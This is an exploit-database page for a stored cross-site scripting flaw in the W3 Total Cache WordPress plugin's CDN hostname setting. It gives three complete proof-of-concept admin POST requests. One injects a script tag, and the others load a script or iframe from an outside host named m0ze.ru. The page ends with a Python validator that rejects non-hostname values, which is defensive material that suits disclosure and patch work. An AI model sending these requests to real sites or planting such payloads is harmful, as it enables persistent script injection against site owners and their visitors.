## https://sploitus.com/exploit?id=WPEX-ID:5DA5CE9A-82A6-404F-8DEC-795D7905B3F9
Vulnerable parameter: cdn_cnames[] (PoC #1, #2 and #3, each placing the payload in a different element of the array).

CDN Type: Akamai, Amazon CloudFront, AT&T, Cotendo, Generic Mirror, Verizon Digital Media Services (EdgeCast), Amazon CloudFront Over S3, Amazon Simple Storage Service (S3), Amazon Simple Storage Service (S3) Compatible, Microsoft Azure Storage, Self-hosted.

### PoC #1 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for CSS)

```http
POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=%23%27%22%3E%3Cscript%3Ealert%28%29%3B%3C%2Fscript%3E%3Cdiv+x&cdn_cnames%5B%5D=&cdn_cnames%5B%5D=&cdn_cnames%5B%5D=&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54a0bbb254
```

### PoC #2 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for JS in `<head>`)

```http
POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=1&cdn_cnames%5B%5D=m0ze.ru%2Fpayload%2Fa.js%27+onload%3D%27alert%2813%29%3B%27+stuff%3D%27&cdn_cnames%5B%5D=&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54d06077f1
```

### PoC #3 | Authenticated Persistent XSS | CDN > Replace site's hostname with (reserved for JS after `<body>`)

```http
POST /wp-admin/admin.php?page=w3tc_cdn HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 2204

cdn__uploads__enable=0&cdn__uploads__enable=1&cdn__includes__enable=0&cdn__includes__enable=1&cdn__theme__enable=0&cdn__theme__enable=1&cdn__custom__enable=0&cdn__custom__enable=1&cdn__force__rewrite=0&cdn__canonical_header=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099&cdn__ftp__pasv=0&cdn__ftp__host=&cdn__ftp__type=&cdn__ftp__user=&cdn__ftp__pass=&cdn__ftp__path=&cdn__ftp__ssl=auto&cdn_cnames%5B%5D=1&cdn_cnames%5B%5D=2&cdn_cnames%5B%5D=%23%27%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099&w3tc_default_save_and_flush=Save+Settings+%26+Purge+Caches&cdn__flush_manually=0&cdn__reject__ssl=0&cdn__admin__media_library=0&cdn__cors_header=0&cdn__cors_header=1&cdn__reject__logged_roles=0&cdn__reject__roles=&cdn__reject__uri=&cdn__autoupload__enabled=0&cdn__autoupload__interval=3600&cdn__queue__interval=900&cdn__queue__limit=25&cdn__includes__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.xml&cdn__theme__files=*.css%3B*.js%3B*.gif%3B*.png%3B*.jpg%3B*.ico%3B*.ttf%3B*.otf%3B*.woff%3B*.woff2%3B*.less&cdn__import__files=&cdn__custom__files=favicon.ico%0D%0A%7Bwp_content_dir%7D%2Fgallery%2F*%0D%0A%7Bwp_content_dir%7D%2Fuploads%2Favatars%2F*%0D%0A%7Bplugins_dir%7D%2Fwordpress-seo%2Fcss%2Fxml-sitemap.xsl%0D%0A%7Bplugins_dir%7D%2Fwp-minify%2Fmin*%0D%0A%7Bplugins_dir%7D%2F*.js%0D%0A%7Bplugins_dir%7D%2F*.css%0D%0A%7Bplugins_dir%7D%2F*.gif%0D%0A%7Bplugins_dir%7D%2F*.jpg%0D%0A%7Bplugins_dir%7D%2F*.png&cdn__reject__ua=&cdn__reject__files=%7Buploads_dir%7D%2Fwpcf7_captcha%2F*%0D%0A%7Buploads_dir%7D%2Fimagerotator.swf%0D%0A%7Bplugins_dir%7D%2Fwp-fb-autoconnect%2Ffacebook-platform%2Fchannel.html&set_cookie_domain_old=0&set_cookie_domain_new=0&_wpnonce=5f67f11949&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dw3tc_cdn%26w3tc_message%3D60a54cf6ef099
```
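As an added defensive check (written for this page, not taken from the advisory or from W3 Total Cache itself): a Python validator that parses a form-encoded body like the three PoC requests, extracts every cdn_cnames[] value and flags any entry that is not a bare hostname, which is the restriction a fix has to enforce before the value is echoed into the generated tags. The sample body, the function names and the hostname regex are my assumptions.

```python
"""Audit check for the W3 Total Cache cdn_cnames[] setting (added example).

Parses a form-encoded POST body such as the PoC requests above, pulls out
every cdn_cnames[] value and reports entries that are not a plain hostname
with an optional port. Any value that could break out of the quoted
attribute of the generated <link>/<script> tag fails this check.
"""
import re
from urllib.parse import parse_qs

# RFC 1123 hostname labels: letters, digits, hyphens; no leading/trailing hyphen.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}(?::\d{{1,5}})?$", re.IGNORECASE)


def is_valid_cname(value: str) -> bool:
    """True only for a bare hostname such as cdn.example.com or cdn.example.com:8443."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


def extract_cnames(body: str) -> list[str]:
    """Return all cdn_cnames[] values from a form-encoded body, in order."""
    return parse_qs(body, keep_blank_values=True).get("cdn_cnames[]", [])


def audit_cnames(body: str) -> list[tuple[int, str]]:
    """Return (index, value) for every non-empty cname that fails validation."""
    return [(i, v) for i, v in enumerate(extract_cnames(body)) if v and not is_valid_cname(v)]


# Constructed sample body modelled on the PoC requests (hypothetical data):
# a benign hostname in slot 0, an attribute-breaking value in slot 1, slot 2 empty.
SAMPLE_BODY = (
    "cdn__uploads__enable=1&cdn_cnames%5B%5D=cdn.example.com"
    "&cdn_cnames%5B%5D=%23%27%22%3E%3Cdiv+x&cdn_cnames%5B%5D="
    "&w3tc_default_save_and_flush=Save+Settings"
)

if __name__ == "__main__":
    for idx, bad in audit_cnames(SAMPLE_BODY):
        print(f"cdn_cnames[{idx}] rejected: {bad!r}")
```

The same check applied at save time in the plugin (reject the whole request when any element fails) removes the sink the three PoCs rely on regardless of which slot the value lands in.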